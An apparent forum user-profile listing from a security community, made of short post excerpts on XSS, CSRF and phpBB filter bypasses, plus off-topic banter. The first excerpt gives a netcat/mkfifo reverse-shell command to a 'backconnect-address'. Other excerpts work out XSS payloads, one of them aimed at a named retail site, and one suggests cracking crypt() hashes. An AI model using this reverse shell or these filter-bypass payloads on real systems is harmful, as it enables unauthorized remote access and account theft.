Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 

Current Page: 1 of 1
Results 1 - 26 of 26
4 years ago
chosi
Current Ubuntu's netcat does not come with an -e switch (i.e. executing commands directly from within netcat), so I saw this workaround, which might fit into this thread: listening: mkfifo mypipe;cat mypipe|/bin/bash|nc -l 6000 >mypipe;rm mypipe connecting: mkfifo mypipe;cat mypipe|/bin/bash|nc backconnect-address 12344 >mypipe;rm mypipe (change backconnectaddress and/or ports) P.S.:
Forum: Obfuscation
4 years ago
chosi
ugh, congrats man.. and of course the bruteforce starts with A and ends with z :P
Forum: OMG Ponies
4 years ago
chosi
"mixed alpha" does not include weird letters like รถ, does it? ;)
Forum: OMG Ponies
4 years ago
chosi
me too. seems like you have a typo in your challenge :P
Forum: OMG Ponies
4 years ago
chosi
....despite the fact, that you can just fake the referer ;)
Forum: CSRF and Session Info
4 years ago
chosi
The Session-ID is probably bound to the victim's IP address
Forum: XSS Info
4 years ago
chosi
err. there is no CNAME (anymore?). EDIT: nvm, I confused www.google-anon.com with google-anon.com ;)
Forum: Privacy
5 years ago
chosi
oh interesting. thanks for the answers! :)
Forum: XSS Info
5 years ago
chosi
Hi, are there are any known test results, how browser handle HTML-Tags after a closing </html>. I was just wondering how for example an <img>-Tag gets handled depending on browser (and, if this is a serious criterion, doctype). My quick answer would be "yeah, everything after a </html>-Tag gets rendered, evaluated and so on, completely disregarding the closing tag"
Forum: XSS Info
5 years ago
chosi
her texts should be on twitter *scnr*
Forum: OMG Ponies
5 years ago
chosi
...yes!
Forum: OMG Ponies
5 years ago
chosi
rvdh is right, it's most probably crypt(), like used in /etc/shadow. so I'd recommend john the ripper to crack it
Forum: SQL and Code Injection
5 years ago
chosi
PaPPy Wrote: ------------------------------------------------------- > ... > i need some help with this one > http://www.homedecorators.com/search.php?search=%2 > 2%3E%2526lt%26lt%3B%2Fa%26gt%3Bmarquee%3Etest&x=0& > y=0 how about http://www.homedecorators.com/searchTips.php?search=%22%3E/onmouseover=alert(1)// - only an event handler though :) Fnny: NoScript s
Forum: Full Disclosure
5 years ago
chosi
digi7al64 Wrote: > blackboard has so many xss (persistent and > reflective) vuns in it its not funny. We spent an > afternoon on it one day and came back with about > 20 different versions in different spots. yup. if you try three random parameters in an url. at least two of them are vulnerable. great for people new in xss: it's _bound_ to happen ;)
Forum: Full Disclosure
5 years ago
chosi
oh yeah right. thank you ;)
Forum: XSS Info
5 years ago
chosi
hello & merry christmas :) Usually when I find an xss-vulnerability on a webpace, I sending the guy/author an email like "oh, there's an xss-thingie on your site, please fix. see proof of concept (link) and consider escaping input from the web. of course this vulnerability might allow malicious guys to steal user-accounts ..." BUT: I recently found an xss-vulnerability on a w
Forum: XSS Info
5 years ago
chosi
That explains it all. :> I even managed to create a XHR with this limited charset.. Did you know that you dont need the "new" in r=new XMLHttpRequest()? :)
Forum: XSS Info
5 years ago
chosi
OK I got something! :) It works if we use this one: onload=document.location="javascript:alert%281%29// The HTML output would be: <img src="http://..mimetex.cgi?E<a href="http://onload=document.location=&quot;javascript&#058;alert%281%29//" ..> The colon is still filtered, but somehow Firefox doesn't mind it *now*, since we start with a double quot
Forum: XSS Info
5 years ago
chosi
Thanks Gareth, we're getting closer now: The first one is not "URLish" enough - we're being inside a standard url-bbtag of PHP here - so no newlines either (I meant whitespaces including newlines, tabs etc.) The second one, doesn't match the URL Regex as well, phpBB doesnt like backslashes nor single quotes. What I did find out: % does NOT get encoded (contrary to what I sad above -
Forum: XSS Info
5 years ago
chosi
Thank your for finding this out! I didn't have the chance to take a look at the ACP of phpBB3 yet - so I'll talk to the guy with the LaTeX-Idea about this issue ;) Nevertheless: Any idea to call functions like alert(1) without the use of parenthesis AND whitespaces? I didn't get closer than these two: a setter=alert,a=1 -- Not allowed whitespace a=alert,a(1) -- Not allowed parenthesis
Forum: XSS Info
5 years ago
chosi
Okay I continued testing, also using your examples. Let me sum up, what I found out: - I cannot use parentheses( and ), also using %28 and %29 does not work. - No Whitespaces - Input has to look like a URL, checked against with a RegEx - The closing " after my Payload causes JS-Errors. So I will end with // - The img gets loaded so we, of course, use an onload-event. My conclusion is:
Forum: XSS Info
5 years ago
chosi
Ok, javascript: doesnt work, as there is a second whitelist-check against allowed protocols. Dont know why phpBB checks twice :) So we're still looking for a character to seperate html-attributes (except whitespaces and a slash)
Forum: XSS Info
5 years ago
chosi
I *do* have problems exploiting this :> The problem is, that phpBB's limits are quite hard to work with. We can start the content of [-tags only with lettersOnly]
Forum: XSS Info
5 years ago
chosi
Starting with a forward slash is not allowed (I suppose we have to match against a RegEx for urls - will find out about that in phpbb-code as well). I will think about a possible circumvention later - after reading the mentioned topic Thanks for your input - gonna check that out tomorrow :)
Forum: XSS Info
5 years ago
chosi
I got a little further: (again [-brackets are replaced) D(latex]E(url=http://example.org/?;onerror=window.location=//example.org/+//test.html]text(/url]B(/latex]C leads to: D<img src="http://mitaub.sourceforge.net/cgi-bin/mimetex.cgi?E<a href="http://example.org/?;onerror=window.location=//example.org/+//test.html" target="_blank" class="postlink"&
Forum: XSS Info
5 years ago
chosi
Hey, there's a feature in phpBB to create your own bbtags, which can lead to invalid html-code. Please note that I have replaced the character '[' by '(' to prevent *THIS* Forum from interpreting any BBCode ;) There's a quite common method to render LaTeX by inserting an img, e.g.: (LaTeX]{TEXT}(/LaTeX] is replaced with: <img src="http://mitaub.sourceforge.net/cgi-bin/mimet
Forum: XSS Info
Current Page: 1 of 1